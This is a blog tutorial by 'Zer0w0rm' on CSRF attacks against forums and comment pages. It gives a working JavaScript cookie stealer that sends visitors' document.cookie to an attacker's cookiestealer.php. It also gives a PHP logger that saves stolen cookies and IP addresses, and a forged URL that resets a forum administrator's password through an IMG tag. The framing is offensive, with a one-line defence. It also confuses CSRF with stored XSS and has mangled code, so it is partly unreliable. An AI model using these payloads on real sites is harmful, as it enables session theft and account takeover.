CSRF(Cross-Site Request Forgery) / XSRF Attacks

In this tutorial I'll be discussing how a CSRF or XSRF attack works.
The method is called CSRF as well as XSRF. CSRF stands for Cross-Site Request Forgery. If you say XSRF the X obviously stands for the cross, just like XSS (Cross-Site Scripting).


I will be calling the method CSRF for the rest of the tutorial, because I prefer that term.

Table of Contents:

    1) What is Cross-Site Request Forgery?
    2) How do I find CSRF vulnerabilities?
    3) How to take advantage of the IMG tag?
    4) Keep it Simple
    5) Securing yourself against CSRF
    6) Conclusion

1) What is Cross-Site Request Forgery?

I just told you guys what CSRF stands for, so it will be unnessecairy to say it twice ^^. 

When performing a CSRF attack you can inject code in a webpage, like on forums or other websites where you can post comments on whatever what. The idea is to execute a HTTP request once a user visits the affected webpage, because this attack takes place on the side of the victim (Client-Sided), the request will be executed from the machine of the victim that vists the webpage. If, for example, a user is logged in to YouTube, a link can be crafted that can be hidden on a forum, which logs you out of YouTube. 

We can go waaaay further with this by, for example, making a request to a webpage, that, upon visiting, makes a few other request by using JavaScript. This could be used to steal information from websites the user is logged in to.

2) How do I find CSRF vulnerabilities?

CSRF vulnerabilities are often found in webpages with low security that allow everyone to make posts and comments. (Guests can comment) The fun part in that, is that you can create a post that can be seen by everyone visiting that page.

Though, it has to be possible to use HTML or BBCode.

The IMG Tag

A IMG tag in HTML (<img>) is often used as the following:

Code:
<img src="http://website.com/myimage.jpg">

As you may know PHP pages are also able to return images. This gives the possibility to do this, for example.

Code:
<img src="http://website.com/my_php_page.php">

If the PHP page my_php_page returns an image, the image will be displayed by the HTML tag.

3) How to take advantage of the IMG tag?

Yea, so how do we actually do it? Well, as I said PHP pages can also return images. Let's get to this simple scenario:

You've just found a webpage with the possibility to place comments, and you're able to use HTML within the comments. The website does not check the refer, and it's possible to use PHP extensions within the IMG tag. You write some PHP code that returns a image, but at the same time executes some Javascript too, that sends the victim to another page. If someone visits the page where you used the IMG tag, a picture will be shown, but at the same time the Javascript code is running as well. This way you can steal cookies, for example, or even write and post comments under somebody elses name.

Pretend we have the following code:

PHP Code:
<html><head><script type="text/javascript">
    var 
http GetXmlHttpObject();
    if(
http != null)
    {
      var 
url "http://mywebsite.com/cookiestealer.php?cookie=" document.cookie;
      
http.open("GET"urlfalse);
      
http.send(null);
    }

    function 
GetXmlHttpObject()
    {
      if(
window.XMLHttpRequest)
      {
      return new 
XMLHttpRequest();
      }
      if(
window.ActiveXObject)
      {
      return new 
ActiveXObject("Microsoft.XMLHTTP");
      }
      return 
null;
    }
</script></head></html> 

Note: In this case I did not write PHP code to display an image. This is simple HTML/JS code that executes a HTML request to a certain page.

If you're a little familiar with JS you can see there was make a HTTP GET request to the page mywebsite.com/cookiestealer.php. After that, a GET arguement will be given that has the value 'document.cookie'. Document.cookie will always contain the cookie of the page where the Javascript code is being executed. In this case it will steal the cookie of the user that visits the page.

On the website I've found I've uploaded the following code:

PHP Code:
<?php
    $cookie 
$_GET['cookie'];
    
$ip $_SERVER['REMOTE_ADDR'];

    
$fh fopen("log.txt"'a') or die("can't open file");
    
fwrite($fh$cookie "\n" $ip "\n\n");

    
fclose($fh);?>

This PHP code will get the value of the GET arguement and the IP address of the person visiting your page. After that the code would add this information into the file called 'log.txt'.

Every time someone visits the page where I posted the link with the IMG tag with a link to a page that executes the JS code, the code will request the cookiestealer and place the cookie in the GET arguement.

At last, you can see the cookies flow into your log. ^^

4) Keep it Simple.

In the above code I showed a kind of extensive example. Really bad secured websites with bad software have even bigger bugs than that. 

Like that you can for example first install the forum software on your local software, and look what HTTP GET request you have to make to change the password of the administrator. Pretend it's like the following:

Code:
http://forum.com/admincp/change_admin_pass.php?newpass=mynewpass123

You'd have to send that URL to the Administrator in a Private Message, in a IMG tag. If the administrator reads the message, a request will be made to the above URL and will change the Admin password to mynewpass123.

I have to say, it's often alot harder than the above example. ^^

5) Protecting yourself against CSRF
You can protect yourself against CSRF attacks by, for example, stop loading images. I think this is a little devious, so I'm thinking about making an add-on that blocks all images that don't have a image-extension. Unless you allow it, ofcourse.

6) Conclusion

So what is a CSRF attack..? A CSRF attack is an attack that can be performed with less effort, if you know what you're doing, and can do alot of damage. Protecting against CSRF attacks is harder, but good to accomplish if you're working on, for example, a CMS. 



Thank you(zer0w0rm) 

Published By : Zer0w0rm ~ Zer0w0rm

 

0 comments:

Post a Comment